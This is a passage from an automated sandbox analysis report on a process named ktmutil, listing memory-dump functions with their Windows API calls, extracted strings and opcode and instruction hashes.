              • Opcode Fuzzy Hash: 653eda6beaca97580ca9b1e8a35783d7e959db80bf7dc2155313d5db26253e23
              • Instruction Fuzzy Hash: 0DE06D716042047BDA14EE99DC42EDB33ACEFC9710F404418FA08AB241DA31B8118BB4
              Function 003B9400 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
              Download Yara Rule
              APIs
              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,897F72E7,00000007,00000000,00000004,00000000,003A3A0D,000000F4), ref: 003B943F
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: f3ae2118e32b657e4fc6e5887cc66640ba6023f102721afeae8478fa6d0573ab
              • Instruction ID: bed695fb5d802b8bd52bd2414b1c09fa133d426c8cdaa56fd731821ba2463134
              • Opcode Fuzzy Hash: f3ae2118e32b657e4fc6e5887cc66640ba6023f102721afeae8478fa6d0573ab
              • Instruction Fuzzy Hash: 87E06D716042047BDA14EE99DC41FAB37ACEFC8710F104408FA08AB241D671B910CBB5
              Function 003A7FF0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 003A801C
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: aa9ac82091a9c2a6c814f0850ac9a70da26d26b8c0d8b919a9b8bd096aa13c03
              • Instruction ID: 7cd2b99d99a7ba853dd81e41e79600dbd484982f971074d75e50eca8b1416288
              • Opcode Fuzzy Hash: aa9ac82091a9c2a6c814f0850ac9a70da26d26b8c0d8b919a9b8bd096aa13c03
              • Instruction Fuzzy Hash: 84E0807514020437F729B768DC45F66335CD745724F554650BA1CDF1C2F5F5F9018150
              Function 003A7DD7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,003A1980,003B7C8F,OS;,003A194D), ref: 003A7E13
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 8fe15da4802f078025882c896acdad01ca2eee000e9cc561e8a069fafd1db6f9
              • Instruction ID: 8f9e34f9efffd9c53d2bee6357981d7783e86aed160999ed5eb8b15840447883
              • Opcode Fuzzy Hash: 8fe15da4802f078025882c896acdad01ca2eee000e9cc561e8a069fafd1db6f9
              • Instruction Fuzzy Hash: D2E08C312442017FE712EBB5CC83FAA37A8AB54344F0841A8B90CEB382E925F510C760
              Function 003A7DE0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,003A1980,003B7C8F,OS;,003A194D), ref: 003A7E13
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 6691acbc3237f186ed5b937b350745d1ae96eb8c5f93b6acad4b67600cb70799
              • Instruction ID: 499091c3953a75360ae683e510697a8cdbd06ff428583511645dd929962b16a7
              • Opcode Fuzzy Hash: 6691acbc3237f186ed5b937b350745d1ae96eb8c5f93b6acad4b67600cb70799
              • Instruction Fuzzy Hash: 52D05E712442053BF646AAA6CC43F57329C9B14754F4544A4BA0CEB2C2E865F5104265
              Function 02E42C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e0ae798135960e035e94e649b5e61a6f6c7fa89017ba25c940554617c4e9c356
              • Instruction ID: bc7124bdf8f9e5f1ad3e2f71cb8c754bc42f4a49a097e10295d9be75243d28fc
              • Opcode Fuzzy Hash: e0ae798135960e035e94e649b5e61a6f6c7fa89017ba25c940554617c4e9c356
              • Instruction Fuzzy Hash: 42B09B719415D5C5DE51E7605A09717790067D0705F15D061F7030641F4778D1D1F575

              Non-executed Functions

              Function 02C204E0 Relevance: .2, Instructions: 151COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.2981981929.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2c20000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 81616273bf150e56a5ce93943c390501a2c2e4e53ebec785f3e47b0cc8a34ddf
              • Instruction ID: c9cb8065c315c3fc9cfaa39ddf50dd656c70b0018b68a12d1695e96fdf1b098d
              • Opcode Fuzzy Hash: 81616273bf150e56a5ce93943c390501a2c2e4e53ebec785f3e47b0cc8a34ddf
              • Instruction Fuzzy Hash: 4241F671508B1D4FC368AF689081676B3E6FF95300F50052ED88AC3652EF74E54A8789
              Function 02C2DE2A Relevance: 56.5, Strings: 45, Instructions: 213COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2981981929.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2c20000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
              • API String ID: 0-3558027158
              • Opcode ID: f68e144e6b31d285144ce4b412172dde51581c6915b53f866f36739e7ab4427d
              • Instruction ID: d33f17a116e257de871038b51b789f3c935ee10c8ec15a1c84ed2b0a0d93648d
              • Opcode Fuzzy Hash: f68e144e6b31d285144ce4b412172dde51581c6915b53f866f36739e7ab4427d
              • Instruction Fuzzy Hash: F7914FF04082948AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8909DB85
              Function 02E42890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: c82e42df96f954ed8dec6ef703589aaaa492e1bfe712a85ba6acd8d57c4384d6
              • Instruction ID: 568fb4eb92b202e670b1ed7fa8e8d758fbf5aa91e183f0583d1a84c0985a16a2
              • Opcode Fuzzy Hash: c82e42df96f954ed8dec6ef703589aaaa492e1bfe712a85ba6acd8d57c4384d6
              • Instruction Fuzzy Hash: C551D6B2A40156AFDB10DFA8D89097EFBB8BB08304B50D269FA65D7741D734DE40CBA0
              Function 02E37630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
              Download Yara Rule
              Strings
              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02E74742
              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02E74787
              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02E74725
              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02E74655
              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02E746FC
              • Execute=1, xrefs: 02E74713
              • ExecuteOptions, xrefs: 02E746A0
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
              • API String ID: 0-484625025
              • Opcode ID: a684a422f53f545991444ff59213ef89ce2c650073b7064e26ab876a1c71e474
              • Instruction ID: 629d6ae6772cad7f4cc4e13bb12220b0d28dd665a4bf3b881ab3f8aef2521003
              • Opcode Fuzzy Hash: a684a422f53f545991444ff59213ef89ce2c650073b7064e26ab876a1c71e474
              • Instruction Fuzzy Hash: BD511AB16C02197AEF11ABA4EC99FFDB3B9AF04309F0494A9E509A71C0DB709E45CF51
              Function 02E4B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-$0$0
              • API String ID: 1302938615-699404926
              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction ID: 5aae38b9eb0fdae05ff4f40118c027c761c0c9c466038234cbc5db602dce884c
              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction Fuzzy Hash: A881B170E852499ADF248F68E855BFEBBB2AF4531CF18E25DE851A7290CF34D840CB50
              Function 02E2F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
              Download Yara Rule
              Strings
              • RTL: Re-Waiting, xrefs: 02E7031E
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E702BD
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E702E7
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
              • API String ID: 0-2474120054
              • Opcode ID: cae3fc36694c50689527cd37b3e0c0aa625981b71107deac6ea7abadfb9d5f50
              • Instruction ID: 8c4a6d27767ea042d2d34be0889ed3d5874a02f67c169b42ab1260c5f4697cbf
              • Opcode Fuzzy Hash: cae3fc36694c50689527cd37b3e0c0aa625981b71107deac6ea7abadfb9d5f50
              • Instruction Fuzzy Hash: B5E1DE316887419FD724CF28C884B6AB7F1FB84318F149A5DF5A68B6E1D774D848CB82
              Function 02E3BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
              Download Yara Rule
              Strings
              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02E77B7F
              • RTL: Re-Waiting, xrefs: 02E77BAC
              • RTL: Resource at %p, xrefs: 02E77B8E
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 0-871070163
              • Opcode ID: 3bc36127e6639cc2127b100f9efa789ffdb2826a0ce23dbb985b5c896e34c65c
              • Instruction ID: 007cc9e819012da413d44bd308c69e3031e03488e1c99bc611380d8e2bf25a47
              • Opcode Fuzzy Hash: 3bc36127e6639cc2127b100f9efa789ffdb2826a0ce23dbb985b5c896e34c65c
              • Instruction Fuzzy Hash: 9441D3313807029BD725DE26CC50B6AB7E6EF84719F00AA1DF95ADB680DB31E805CF91
              Function 02E3B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
              Download Yara Rule
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E7728C
              Strings
              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02E77294
              • RTL: Re-Waiting, xrefs: 02E772C1
              • RTL: Resource at %p, xrefs: 02E772A3
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 885266447-605551621
              • Opcode ID: fff581696bd676fa105185ecc16bc18b37153462ef91172a307b5d0a340aa992
              • Instruction ID: ecf8e5dbf8112ddfb3a4079908c6035704b04c2911f02bb6d01fb1a508953d2a
              • Opcode Fuzzy Hash: fff581696bd676fa105185ecc16bc18b37153462ef91172a307b5d0a340aa992
              • Instruction Fuzzy Hash: 1F412571780242ABDB11DE24CC41F66B7A5FF94729F10A61DFD6ADB240DB20E846CBD1
              Function 02E47D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-
              • API String ID: 1302938615-2137968064
              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction ID: a2108023109410d9a5f8ef60e4669236a662a2fb1ec83500a0da6b786ab821da
              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction Fuzzy Hash: A8919470E802159ADB24DE6AE8807BEF7A5BF45728F54E71AE855E72C0DF309940CB90
              Function 02E09126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: $$@
              • API String ID: 0-1194432280
              • Opcode ID: 6c4e8e11961712defa9e48b8d1c8a856b961fb21249437c0b68e51de9e340727
              • Instruction ID: 08c90950a33ef105cbb7623b228c5c907d8fa8241ccafa80eea82517ca85288b
              • Opcode Fuzzy Hash: 6c4e8e11961712defa9e48b8d1c8a856b961fb21249437c0b68e51de9e340727
              • Instruction Fuzzy Hash: 21814C71D802699BDB35CF54CC44BEEB7B8AF08754F0091EAAA09B7281D7305E85CFA0
              Function 02C23A48 Relevance: 5.0, Strings: 4, Instructions: 27COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2981981929.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2c20000_ktmutil.jbxd
              Similarity
              • API ID:
              • String ID: $.#6$%8+2$'$nb&'
              • API String ID: 0-4016731361
              • Opcode ID: 7cbf082442684b7fc8514e31059fa2130a339a1b750ace6201fe2fdb5fd464f9
              • Instruction ID: dcf309da9b8d28fed7915658f0adaeefd4a06be9f4cf8ab68987d08847c89808
              • Opcode Fuzzy Hash: 7cbf082442684b7fc8514e31059fa2130a339a1b750ace6201fe2fdb5fd464f9
              • Instruction Fuzzy Hash: 31E065301687848BCB05AB1488455597BD1FB88308F840A5DE8CEDA151DB7896058B4B